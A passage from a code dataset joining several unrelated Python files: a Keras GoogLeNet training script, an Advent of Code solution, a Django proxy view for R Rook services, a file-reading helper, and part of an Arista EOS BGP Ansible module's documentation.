inception_3a_1x1 = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_3a/1x1',W_regularizer=l2(0.0002))(pool2_3x3_s2)
inception_3a_3x3_reduce = Convolution2D(96,1,1,border_mode='same',activation='relu',name='inception_3a/3x3_reduce',W_regularizer=l2(0.0002))(pool2_3x3_s2)
inception_3a_3x3 = Convolution2D(128,3,3,border_mode='same',activation='relu',name='inception_3a/3x3',W_regularizer=l2(0.0002))(inception_3a_3x3_reduce)
inception_3a_5x5_reduce = Convolution2D(16,1,1,border_mode='same',activation='relu',name='inception_3a/5x5_reduce',W_regularizer=l2(0.0002))(pool2_3x3_s2)
inception_3a_5x5 = Convolution2D(32,5,5,border_mode='same',activation='relu',name='inception_3a/5x5',W_regularizer=l2(0.0002))(inception_3a_5x5_reduce)
inception_3a_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_3a/pool')(pool2_3x3_s2)
inception_3a_pool_proj = Convolution2D(32,1,1,border_mode='same',activation='relu',name='inception_3a/pool_proj',W_regularizer=l2(0.0002))(inception_3a_pool)
inception_3a_output = merge([inception_3a_1x1,inception_3a_3x3,inception_3a_5x5,inception_3a_pool_proj],mode='concat',concat_axis=1,name='inception_3a/output')
inception_3b_1x1 = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_3b/1x1',W_regularizer=l2(0.0002))(inception_3a_output)
inception_3b_3x3_reduce = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_3b/3x3_reduce',W_regularizer=l2(0.0002))(inception_3a_output)
inception_3b_3x3 = Convolution2D(192,3,3,border_mode='same',activation='relu',name='inception_3b/3x3',W_regularizer=l2(0.0002))(inception_3b_3x3_reduce)
inception_3b_5x5_reduce = Convolution2D(32,1,1,border_mode='same',activation='relu',name='inception_3b/5x5_reduce',W_regularizer=l2(0.0002))(inception_3a_output)
inception_3b_5x5 = Convolution2D(96,5,5,border_mode='same',activation='relu',name='inception_3b/5x5',W_regularizer=l2(0.0002))(inception_3b_5x5_reduce)
inception_3b_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_3b/pool')(inception_3a_output)
inception_3b_pool_proj = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_3b/pool_proj',W_regularizer=l2(0.0002))(inception_3b_pool)
inception_3b_output = merge([inception_3b_1x1,inception_3b_3x3,inception_3b_5x5,inception_3b_pool_proj],mode='concat',concat_axis=1,name='inception_3b/output')
inception_3b_output_zero_pad = ZeroPadding2D(padding=(1, 1))(inception_3b_output)
# pool3_helper = PoolHelper()(inception_3b_output_zero_pad)
pool3_3x3_s2 = MaxPooling2D(pool_size=(3,3),strides=(2,2),border_mode='valid',name='pool3/3x3_s2')(inception_3b_output_zero_pad)
inception_4a_1x1 = Convolution2D(192,1,1,border_mode='same',activation='relu',name='inception_4a/1x1',W_regularizer=l2(0.0002))(pool3_3x3_s2)
inception_4a_3x3_reduce = Convolution2D(96,1,1,border_mode='same',activation='relu',name='inception_4a/3x3_reduce',W_regularizer=l2(0.0002))(pool3_3x3_s2)
inception_4a_3x3 = Convolution2D(208,3,3,border_mode='same',activation='relu',name='inception_4a/3x3',W_regularizer=l2(0.0002))(inception_4a_3x3_reduce)
inception_4a_5x5_reduce = Convolution2D(16,1,1,border_mode='same',activation='relu',name='inception_4a/5x5_reduce',W_regularizer=l2(0.0002))(pool3_3x3_s2)
inception_4a_5x5 = Convolution2D(48,5,5,border_mode='same',activation='relu',name='inception_4a/5x5',W_regularizer=l2(0.0002))(inception_4a_5x5_reduce)
inception_4a_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_4a/pool')(pool3_3x3_s2)
inception_4a_pool_proj = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_4a/pool_proj',W_regularizer=l2(0.0002))(inception_4a_pool)
inception_4a_output = merge([inception_4a_1x1,inception_4a_3x3,inception_4a_5x5,inception_4a_pool_proj],mode='concat',concat_axis=1,name='inception_4a/output')
loss1_ave_pool = AveragePooling2D(pool_size=(5,5),strides=(3,3),name='loss1/ave_pool')(inception_4a_output)
loss1_conv = Convolution2D(128,1,1,border_mode='same',activation='relu',name='loss1/conv',W_regularizer=l2(0.0002))(loss1_ave_pool)
loss1_flat = Flatten()(loss1_conv)
loss1_fc = Dense(1024,activation='relu',name='loss1/fc',W_regularizer=l2(0.0002))(loss1_flat)
loss1_drop_fc = Dropout(0.7)(loss1_fc)
loss1_classifier = Dense(1000,name='loss1/classifier',W_regularizer=l2(0.0002))(loss1_drop_fc)
loss1_classifier_act = Activation('softmax')(loss1_classifier)
inception_4b_1x1 = Convolution2D(160,1,1,border_mode='same',activation='relu',name='inception_4b/1x1',W_regularizer=l2(0.0002))(inception_4a_output)
inception_4b_3x3_reduce = Convolution2D(112,1,1,border_mode='same',activation='relu',name='inception_4b/3x3_reduce',W_regularizer=l2(0.0002))(inception_4a_output)
inception_4b_3x3 = Convolution2D(224,3,3,border_mode='same',activation='relu',name='inception_4b/3x3',W_regularizer=l2(0.0002))(inception_4b_3x3_reduce)
inception_4b_5x5_reduce = Convolution2D(24,1,1,border_mode='same',activation='relu',name='inception_4b/5x5_reduce',W_regularizer=l2(0.0002))(inception_4a_output)
inception_4b_5x5 = Convolution2D(64,5,5,border_mode='same',activation='relu',name='inception_4b/5x5',W_regularizer=l2(0.0002))(inception_4b_5x5_reduce)
inception_4b_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_4b/pool')(inception_4a_output)
inception_4b_pool_proj = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_4b/pool_proj',W_regularizer=l2(0.0002))(inception_4b_pool)
inception_4b_output = merge([inception_4b_1x1,inception_4b_3x3,inception_4b_5x5,inception_4b_pool_proj],mode='concat',concat_axis=1,name='inception_4b_output')
inception_4c_1x1 = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_4c/1x1',W_regularizer=l2(0.0002))(inception_4b_output)
inception_4c_3x3_reduce = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_4c/3x3_reduce',W_regularizer=l2(0.0002))(inception_4b_output)
inception_4c_3x3 = Convolution2D(256,3,3,border_mode='same',activation='relu',name='inception_4c/3x3',W_regularizer=l2(0.0002))(inception_4c_3x3_reduce)
inception_4c_5x5_reduce = Convolution2D(24,1,1,border_mode='same',activation='relu',name='inception_4c/5x5_reduce',W_regularizer=l2(0.0002))(inception_4b_output)
inception_4c_5x5 = Convolution2D(64,5,5,border_mode='same',activation='relu',name='inception_4c/5x5',W_regularizer=l2(0.0002))(inception_4c_5x5_reduce)
inception_4c_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_4c/pool')(inception_4b_output)
inception_4c_pool_proj = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_4c/pool_proj',W_regularizer=l2(0.0002))(inception_4c_pool)
inception_4c_output = merge([inception_4c_1x1,inception_4c_3x3,inception_4c_5x5,inception_4c_pool_proj],mode='concat',concat_axis=1,name='inception_4c/output')
inception_4d_1x1 = Convolution2D(112,1,1,border_mode='same',activation='relu',name='inception_4d/1x1',W_regularizer=l2(0.0002))(inception_4c_output)
inception_4d_3x3_reduce = Convolution2D(144,1,1,border_mode='same',activation='relu',name='inception_4d/3x3_reduce',W_regularizer=l2(0.0002))(inception_4c_output)
inception_4d_3x3 = Convolution2D(288,3,3,border_mode='same',activation='relu',name='inception_4d/3x3',W_regularizer=l2(0.0002))(inception_4d_3x3_reduce)
inception_4d_5x5_reduce = Convolution2D(32,1,1,border_mode='same',activation='relu',name='inception_4d/5x5_reduce',W_regularizer=l2(0.0002))(inception_4c_output)
inception_4d_5x5 = Convolution2D(64,5,5,border_mode='same',activation='relu',name='inception_4d/5x5',W_regularizer=l2(0.0002))(inception_4d_5x5_reduce)
inception_4d_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_4d/pool')(inception_4c_output)
inception_4d_pool_proj = Convolution2D(64,1,1,border_mode='same',activation='relu',name='inception_4d/pool_proj',W_regularizer=l2(0.0002))(inception_4d_pool)
inception_4d_output = merge([inception_4d_1x1,inception_4d_3x3,inception_4d_5x5,inception_4d_pool_proj],mode='concat',concat_axis=1,name='inception_4d/output')
loss2_ave_pool = AveragePooling2D(pool_size=(5,5),strides=(3,3),name='loss2/ave_pool')(inception_4d_output)
loss2_conv = Convolution2D(128,1,1,border_mode='same',activation='relu',name='loss2/conv',W_regularizer=l2(0.0002))(loss2_ave_pool)
loss2_flat = Flatten()(loss2_conv)
loss2_fc = Dense(1024,activation='relu',name='loss2/fc',W_regularizer=l2(0.0002))(loss2_flat)
loss2_drop_fc = Dropout(0.7)(loss2_fc)
loss2_classifier = Dense(1000,name='loss2/classifier',W_regularizer=l2(0.0002))(loss2_drop_fc)
loss2_classifier_act = Activation('softmax')(loss2_classifier)
inception_4e_1x1 = Convolution2D(256,1,1,border_mode='same',activation='relu',name='inception_4e/1x1',W_regularizer=l2(0.0002))(inception_4d_output)
inception_4e_3x3_reduce = Convolution2D(160,1,1,border_mode='same',activation='relu',name='inception_4e/3x3_reduce',W_regularizer=l2(0.0002))(inception_4d_output)
inception_4e_3x3 = Convolution2D(320,3,3,border_mode='same',activation='relu',name='inception_4e/3x3',W_regularizer=l2(0.0002))(inception_4e_3x3_reduce)
inception_4e_5x5_reduce = Convolution2D(32,1,1,border_mode='same',activation='relu',name='inception_4e/5x5_reduce',W_regularizer=l2(0.0002))(inception_4d_output)
inception_4e_5x5 = Convolution2D(128,5,5,border_mode='same',activation='relu',name='inception_4e/5x5',W_regularizer=l2(0.0002))(inception_4e_5x5_reduce)
inception_4e_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_4e/pool')(inception_4d_output)
inception_4e_pool_proj = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_4e/pool_proj',W_regularizer=l2(0.0002))(inception_4e_pool)
inception_4e_output = merge([inception_4e_1x1,inception_4e_3x3,inception_4e_5x5,inception_4e_pool_proj],mode='concat',concat_axis=1,name='inception_4e/output')
inception_4e_output_zero_pad = ZeroPadding2D(padding=(1, 1))(inception_4e_output)
pool4_helper = PoolHelper()(inception_4e_output_zero_pad)
pool4_3x3_s2 = MaxPooling2D(pool_size=(3,3),strides=(2,2),border_mode='valid',name='pool4/3x3_s2')(pool4_helper)
inception_5a_1x1 = Convolution2D(256,1,1,border_mode='same',activation='relu',name='inception_5a/1x1',W_regularizer=l2(0.0002))(pool4_3x3_s2)
inception_5a_3x3_reduce = Convolution2D(160,1,1,border_mode='same',activation='relu',name='inception_5a/3x3_reduce',W_regularizer=l2(0.0002))(pool4_3x3_s2)
inception_5a_3x3 = Convolution2D(320,3,3,border_mode='same',activation='relu',name='inception_5a/3x3',W_regularizer=l2(0.0002))(inception_5a_3x3_reduce)
inception_5a_5x5_reduce = Convolution2D(32,1,1,border_mode='same',activation='relu',name='inception_5a/5x5_reduce',W_regularizer=l2(0.0002))(pool4_3x3_s2)
inception_5a_5x5 = Convolution2D(128,5,5,border_mode='same',activation='relu',name='inception_5a/5x5',W_regularizer=l2(0.0002))(inception_5a_5x5_reduce)
inception_5a_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_5a/pool')(pool4_3x3_s2)
inception_5a_pool_proj = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_5a/pool_proj',W_regularizer=l2(0.0002))(inception_5a_pool)
inception_5a_output = merge([inception_5a_1x1,inception_5a_3x3,inception_5a_5x5,inception_5a_pool_proj],mode='concat',concat_axis=1,name='inception_5a/output')
inception_5b_1x1 = Convolution2D(384,1,1,border_mode='same',activation='relu',name='inception_5b/1x1',W_regularizer=l2(0.0002))(inception_5a_output)
inception_5b_3x3_reduce = Convolution2D(192,1,1,border_mode='same',activation='relu',name='inception_5b/3x3_reduce',W_regularizer=l2(0.0002))(inception_5a_output)
inception_5b_3x3 = Convolution2D(384,3,3,border_mode='same',activation='relu',name='inception_5b/3x3',W_regularizer=l2(0.0002))(inception_5b_3x3_reduce)
inception_5b_5x5_reduce = Convolution2D(48,1,1,border_mode='same',activation='relu',name='inception_5b/5x5_reduce',W_regularizer=l2(0.0002))(inception_5a_output)
inception_5b_5x5 = Convolution2D(128,5,5,border_mode='same',activation='relu',name='inception_5b/5x5',W_regularizer=l2(0.0002))(inception_5b_5x5_reduce)
inception_5b_pool = MaxPooling2D(pool_size=(3,3),strides=(1,1),border_mode='same',name='inception_5b/pool')(inception_5a_output)
inception_5b_pool_proj = Convolution2D(128,1,1,border_mode='same',activation='relu',name='inception_5b/pool_proj',W_regularizer=l2(0.0002))(inception_5b_pool)
inception_5b_output = merge([inception_5b_1x1,inception_5b_3x3,inception_5b_5x5,inception_5b_pool_proj],mode='concat',concat_axis=1,name='inception_5b/output')
pool5_7x7_s1 = AveragePooling2D(pool_size=(7,7),strides=(1,1),name='pool5/7x7_s2')(inception_5b_output)
loss3_flat = Flatten()(pool5_7x7_s1)
pool5_drop_7x7_s1 = Dropout(0.4)(loss3_flat)
loss3_classifier = Dense(1000,name='loss3/classifier',W_regularizer=l2(0.0002))(pool5_drop_7x7_s1)
loss3_classifier_act = Activation('softmax',name='prob')(loss3_classifier)
googlenet = Model(input=input, output=[loss1_classifier_act,loss2_classifier_act,loss3_classifier_act])
model = googlenet
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy')
learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc',
patience=3,
verbose=1,
factor=0.5,
min_lr=0.00001)
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)
zoom_range = 0.1, # Randomly zoom image
width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
horizontal_flip=False, # randomly flip images
vertical_flip=False) # randomly flip images
datagen.fit(trainX)
history = model.fit_generator(datagen.flow(trainX,trainY, batch_size=batch_size),
epochs = epochs, validation_data = (valX,valY),
verbose = 2, steps_per_epoch=trainX.shape[0] // batch_size
, callbacks=[learning_rate_reduction])
# Plot the loss and accuracy curves for training and validation
fig, ax = plt.subplots(2,1)
ax[0].plot(history.history['loss'], color='b', label="Training loss")
ax[0].plot(history.history['val_loss'], color='r', label="validation loss",axes =ax[0])
legend = ax[0].legend(loc='best', shadow=True)
ax[1].plot(history.history['acc'], color='b', label="Training accuracy")
ax[1].plot(history.history['val_acc'], color='r',label="Validation accuracy")
legend = ax[1].legend(loc='best', shadow=True)
# plt.show()
from sklearn.metrics import classification_report
y_true = valY
y_pred = model.predict(valX)
print(y_pred)
y_pred_list = list()
for index in range(y_pred.shape[0]):
if y_pred[index][0] > y_pred[index][1]:
y_pred_list.append(0)
else:
y_pred_list.append(1)
y_true_list = list()
for index in range(y_true.shape[0]):
if y_true[index][0] > y_true[index][1]:
y_true_list.append(0)
else:
y_true_list.append(1)
target_names = ['0', '1']
print(classification_report(y_true_list, y_pred_list, target_names=target_names))
model.save('my_model4.h5')
| StarcoderdataPython |
830 | <gh_stars>1-10
def getNumBags(color):
if color=='':
return 0
numBags=1
for bag in rules[color]:
numBags+=bag[1]*getNumBags(bag[0])
return numBags
with open('day7/input.txt') as f:
rules=dict([l.split(' contain') for l in f.read().replace(' bags', '').replace(' bag', '').replace('.', '').replace(' no other', '0 ').splitlines()])
for key in rules:
rules[key]=[(d[2:].strip(), int(d[:2].strip())) for d in rules[key].split(', ')]
print(getNumBags('shiny gold')-1) #-1 cause shiny bag not included | StarcoderdataPython |
3240413 | <filename>tworaven_apps/rook_services/views.py
import requests
import json
from requests.exceptions import ConnectionError
from django.http import JsonResponse, HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from tworaven_apps.call_captures.models import ServiceCallEntry
from tworaven_apps.rook_services.rook_app_info import RookAppInfo
from tworaven_apps.rook_services.models import UI_KEY_SOLA_JSON, ROOK_ZESSIONID
from tworaven_apps.workspaces.workspace_util import WorkspaceUtil
from tworaven_apps.utils.view_helper import get_session_key
from tworaven_apps.utils.view_helper import get_request_body,\
get_request_body_as_json
@csrf_exempt
def view_rook_route(request, app_name_in_url):
"""Route TwoRavens calls to Rook
orig: TwoRavens -> Rook
view: TwoRavens -> Django 2ravens -> Rook
"""
# get the app info
#
rook_app_info = RookAppInfo.get_appinfo_from_url(app_name_in_url)
if rook_app_info is None:
raise Http404(('unknown rook app: "{0}" (please add "{0}" to '
' "tworaven_apps/rook_services/app_names.py")').format(\
app_name_in_url))
# record session metadata, if appropriate
WorkspaceUtil.record_state(request)
# look for the "solaJSON" variable in the POST
#
if rook_app_info.is_health_check():
# this is a health check
raven_data_text = 'healthcheck'
elif request.POST and UI_KEY_SOLA_JSON in request.POST:
# this is a POST with a JSON string under the key solaJSON key
raven_data_text = request.POST[UI_KEY_SOLA_JSON]
else:
# See if the body is JSON format
req_found, raven_data_text = get_request_body_as_json(request)
if not req_found: # Nope, send an error
err_msg = ("Neither key '%s' found in POST"
" nor JSON in request.body") % UI_KEY_SOLA_JSON
return JsonResponse(dict(status="ERROR",
message=err_msg))
# Retrieve post data and attempt to insert django session id
# (if none exists)
#
# retrieve session key
session_key = get_session_key(request)
if isinstance(raven_data_text, str):
blank_session_str = '%s":""' % ROOK_ZESSIONID
if raven_data_text.find(blank_session_str) > -1:
# was converting to JSON, but now just simple text substitution
#
updated_session_str = '%s":"%s"' % (ROOK_ZESSIONID, session_key)
raven_data_text = raven_data_text.replace(blank_session_str, updated_session_str)
elif ROOK_ZESSIONID in raven_data_text:
if raven_data_text[ROOK_ZESSIONID] in [None, '']:
raven_data_text[ROOK_ZESSIONID] = session_key
if not isinstance(raven_data_text, str):
try:
raven_data_text = json.dumps(raven_data_text)
except TypeError:
JsonResponse(dict(success=False,
message='Failed to convert data to JSON'))
app_data = dict(solaJSON=raven_data_text)
rook_svc_url = rook_app_info.get_rook_server_url()
# Begin object to capture request
#
call_entry = None
if rook_app_info.record_this_call():
call_entry = ServiceCallEntry.get_rook_entry(\
request_obj=request,
call_type=rook_app_info.name,
outgoing_url=rook_svc_url,
request_msg=raven_data_text)
#print('rook_svc_url: %s' % rook_svc_url)
# Call R services
#
try:
rservice_req = requests.post(rook_svc_url,
data=app_data)
except ConnectionError:
err_msg = 'R Server not responding: %s' % rook_svc_url
if rook_app_info.record_this_call():
call_entry.add_error_message(err_msg)
call_entry.save()
resp_dict = dict(message=err_msg)
return JsonResponse(resp_dict)
# Save request result
#
if rook_app_info.record_this_call():
if rservice_req.status_code == 200:
call_entry.add_success_message(rservice_req.text,
rservice_req.status_code)
else:
call_entry.add_error_message(rservice_req.text,
rservice_req.status_code)
call_entry.save()
# Return the response to the user
#
#print(40 * '=')
#print(r.text)
#d = r.json()
#print(json.dumps(d, indent=4))
print('status code from rook call: %d' % rservice_req.status_code)
return HttpResponse(rservice_req.text)
NUM_CLICKS_KEY = 'NUM_CLICKS_KEY'
@csrf_exempt
def view_rp_test(request):
d = dict(name='test url',
status_code=1)
return JsonResponse(d)
# example of incoming POST from TwoRavens
"""
<QueryDict: {'solaJSON': ['{"zdata":"fearonLaitinData.tab","zedges":[["country","ccode"],["ccode","cname"]],"ztime":[],"znom":["country"],"zcross":[],"zmodel":"","zvars":["ccode","country","cname"],"zdv":["cname"],"zdataurl":"","zsubset":[["",""],[],[]],"zsetx":[["",""],["",""],["",""]],"zmodelcount":0,"zplot":[],"zsessionid":"","zdatacite":"Dataverse, Admin, 2015, \\"Smoke test\\", http://dx.doi.org/10.5072/FK2/WNCZ16, Root Dataverse, V1 [UNF:6:iuFERYJSwTaovVDvwBwsxQ==]","zmetadataurl":"http://127.0.0.1:8080/static/data/fearonLaitin.xml","zusername":"rohit","callHistory":[],"allVars":["durest","aim","casename","ended","ethwar","waryrs","pop","lpop","polity2","gdpen","gdptype","gdpenl","lgdpenl1","lpopl1","region"]}']}>
"""
"""
try:
# try to convert text to JSON
#
raven_data_json = json.loads(request.POST['solaJSON'])
# Doublecheck that the ROOK_ZESSIONID is blank
#
if raven_data_json.get(ROOK_ZESSIONID, None) == '':
#print('blank session id....')
# blank id found, subsitute the django session key
#
raven_data_json[ROOK_ZESSIONID] = session_key
#
#
raven_data_text = json.dumps(raven_data_json)
"""
| StarcoderdataPython |
3225726 | <filename>src/app/read_text_files.py
import os
import sys
def get_path_to_input_files():
"""Return absolute path of 'files' folder."""
try:
path = os.getcwd() + "/app/files" # Relative path to working dir expected to contain input files
except FileNotFoundError:
print("Folder named 'files' not found.")
sys.exit()
else:
return path
def read_file(file_path,split_on,drop_list=None):
"""Read file_name line by line. Split each line based on split_on argument and drop list items that equal items in the drop_list.
drop_list is optional and defaults to None.
Return a list containing list of the extracted data."""
content = [] # Empty list to store contents of file being read
try:
file = open(file_path)
except FileNotFoundError:
print(f"File named '{file_path}' not found.")
sys.exit()
else:
while (line := file.readline().rstrip()):
if drop_list != None:
for drop in drop_list:
line = line.replace(drop,"")
fields = line.split(split_on)
content.append(fields)
file.close()
return content | StarcoderdataPython |
140585 | <reponame>Stienvdh/statrick<filename>intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/arista/eos/plugins/modules/eos_bgp_global.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for eos_bgp_global
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: eos_bgp_global
short_description: Manages BGP global resource module
description: This module configures and manages the attributes of BGP global on Arista
EOS platforms.
version_added: 1.4.0
author: <NAME> (@GomathiselviS)
notes:
- Tested against Arista EOS 4.23.0F
- This module works with connection C(network_cli). See the L(EOS Platform Options,eos_platform_options).
options:
config:
description: A list of configurations for BGP global.
type: dict
suboptions:
as_number:
description: Autonomous system number.
type: str
aggregate_address:
description: Configure aggregate address.
type: list
elements: dict
suboptions:
address:
description: ipv4/ipv6 address prefix.
type: str
advertise_only:
description: Advertise without installing the generated blackhole route in
FIB.
type: bool
as_set:
description: Generate autonomous system set path information.
type: bool
attribute_map:
description: Name of the route map used to set the attribute of the
aggregate route.
type: str
match_map:
description: Name of the route map used to filter the contributors of the
aggregate route.
type: str
summary_only:
description: Filters all more-specific routes from updates.
type: bool
bgp_params:
description: BGP parameters.
type: dict
suboptions:
additional_paths:
description: BGP additional-paths commands
type: str
choices: ['install', 'send', 'receive']
advertise_inactive:
description: Advertise BGP routes even if they are inactive in RIB.
type: bool
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
always_compare_med:
description: BGP Always Compare MED
type: bool
asn:
description: AS Number notation.
type: str
choices: ['asdot', 'asplain']
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
bestpath:
description: Select the bestpath selection algorithim for BGP routes.
type: dict
suboptions:
as_path:
description: Select the bestpath selection based on as-path.
type: str
choices: ['ignore', 'multipath_relax']
ecmp_fast:
description: Tie-break BGP paths in a ECMP group based on the order of arrival.
type: bool
med:
description: MED attribute
type: dict
suboptions:
confed:
description: MED Confed.
type: bool
missing_as_worst:
description: MED missing-as-worst.
type: bool
skip:
description: skip one of the tie breaking rules in the bestpath selection.
type: bool
tie_break:
description: Configure the tie-break option for BGP bestpath selection.
choices: ['cluster_list_length', 'router_id']
type: str
client_to_client:
description: client to client configuration.
type: bool
cluster_id:
description: Cluster ID of this router acting as a route reflector.
type: str
confederation:
description: confederation.
type: dict
suboptions:
identifier:
description: Confederation identifier.
type: str
peers:
description: Confederation peers.
type: str
control_plan_filter:
description: Control plane filter for BGP.
type: bool
convergence:
description: Bgp convergence parameters.
type: dict
suboptions:
slow_peer:
description: Maximum amount of time to wait for slow peers to estabilsh session.
type: bool
time:
description: time in secs
type: int
default:
description: Default neighbor configuration commands.
type: str
choices: ['ipv4_unicast', 'ipv6_unicast']
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
host_routes:
description: BGP host routes configuration.
type: bool
labeled_unicast:
description: Labeled Unicast.
type: str
choices: ['ip', 'tunnel']
listen:
description: BGP listen.
type: dict
suboptions:
limit:
description: Set limit on the number of dynamic BGP peers allowed.
type: int
range:
description: Subnet Range to be associated with the peer-group.
type: dict
suboptions:
address:
description: Address prefix
type: str
peer_group:
description: Name of peer group.
type: dict
suboptions:
name:
description: name.
type: str
peer_filter:
description: Name of peer filter.
type: str
remote_as:
description: Neighbor AS number
type: str
log_neighbor_changes:
description: Log neighbor up/down events.
type: bool
missing_policy:
description: Missing policy override configuration commands.
type: dict
suboptions:
direction:
description: Missing policy direction options.
type: str
choices: ['in', 'out']
action:
description: Missing policy action options.
type: str
choices: ['deny', 'permit', 'deny-in-out']
monitoring:
description: Enable Bgp monitoring for all/specified stations.
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
redistribute_internal:
description: Redistribute internal BGP routes.
type: bool
route:
description: Configure route-map for route installation.
type: str
route_reflector:
description: Configure route reflector options
type: dict
suboptions:
set:
description: When True route_reflector is set.
type: bool
preserve:
description: preserve route attributes, overwriting route-map changes
type: bool
transport:
description: Configure transport port for TCP session
type: int
default_metric:
description: Default metric.
type: int
distance:
description: Define an administrative distance.
type: dict
suboptions:
external:
description: distance for external routes.
type: int
internal:
description: distance for internal routes.
type: int
local:
description: distance for local routes.
type: int
graceful_restart:
description: Enable graceful restart mode.
type: dict
suboptions:
set:
description: When True, graceful restart is set.
type: bool
restart_time:
description: Set the max time needed to restart and come back up.
type: int
stalepath_time:
description: Set the max time to hold onto restarting peer stale paths.
type: int
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
access_group:
description: ip/ipv6 access list configuration.
type: dict
suboptions:
afi:
description: Specify ip/ipv6.
type: str
choices: ['ipv4', 'ipv6']
acl_name:
description: access list name.
type: str
direction:
description: direction of packets.
type: str
maximum_paths:
description: Maximum number of equal cost paths.
type: dict
suboptions:
max_equal_cost_paths:
description: Value for maximum number of equal cost paths.
type: int
max_installed_ecmp_paths:
description: Value for maximum number of installed ECMP routes.
type: int
monitoring:
description: BGP monitoring protocol configuration.
type: dict
suboptions:
port:
description: Configure the BGP monitoring protocol port number <1024-65535>.
type: int
received:
description: BGP monitoring protocol received route selection.
type: str
choices: ['post_policy', 'pre_policy']
station:
description: BGP monitoring station configuration.
type: str
timestamp:
description: BGP monitoring protocol Per-Peer Header timestamp behavior.
type: str
choices: ['none', 'send_time']
neighbor:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
peer:
type: str
description: Neighbor address or peer-group.
additional_paths:
description: BGP additional-paths commands.
type: str
choices: ['send', 'receive']
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
default_originate:
description: Originate default route to this neighbor.
type: dict
suboptions:
route_map:
description: Route map reference.
type: str
always:
description: Always originate default route to this neighbor.
type: bool
description:
description: Text describing the neighbor.
type: str
dont_capability_negotiate:
description: Donot perform Capability Negotiation with this
neighbor.
type: bool
ebgp_multihop:
description: Allow BGP connections to indirectly connected
external peers.
type: dict
suboptions:
ttl:
description: Time-to-live in the range 1-255 hops.
type: int
set:
description: If True, ttl is not set.
type: bool
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
export_localpref:
description: Override localpref when exporting to an internal
peer.
type: int
fall_over:
description: Configure BFD protocol options for this peer.
type: bool
graceful_restart:
description: Enable graceful restart mode.
type: bool
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
idle_restart_timer:
description: Neighbor idle restart timer.
type: int
import_localpref:
description: Override localpref when importing from an external
peer.
type: int
link_bandwidth:
description: Enable link bandwidth community for routes to this
peer.
type: dict
suboptions:
set:
description: If True, set link bandwidth
type: bool
auto:
description: Enable link bandwidth auto generation for routes from this peer.
type: bool
default:
description: Enable link bandwidth default generation for routes from this
peer.
type: str
update_delay:
description: Delay outbound route updates.
type: int
local_as:
description: Configure local AS number advertised to peer.
type: dict
suboptions:
as_number:
description: AS number.
type: str
fallback:
description: Prefer router AS Number over local AS Number.
type: bool
local_v6_addr:
description: The local IPv6 address of the neighbor in A:B:C:D:E:F:G:H format.
type: str
maximum_accepted_routes:
description: Maximum number of routes accepted from this peer.
type: dict
suboptions:
count:
description: Maximum number of accepted routes (0 means unlimited).
type: int
warning_limit:
description: Maximum number of accepted routes after which a warning is issued.
(0 means never warn)
type: int
maximum_received_routes:
description: Maximum number of routes received from this peer.
type: dict
suboptions:
count:
description: Maximum number of routes (0 means unlimited).
type: int
warning_limit:
description: Percentage of maximum-routes at which warning is to be issued.
type: dict
suboptions:
limit_count:
description: Number of routes at which to warn.
type: int
limit_percent:
description: Percentage of maximum number of routes at which to warn( 1-100).
type: int
warning_only:
description: Only warn, no restart, if max route limit exceeded.
type: bool
metric_out:
description: MED value to advertise to peer.
type: int
monitoring:
description: Enable BGP Monitoring Protocol for this peer.
type: bool
next_hop_self:
description: Always advertise this router address as the BGP
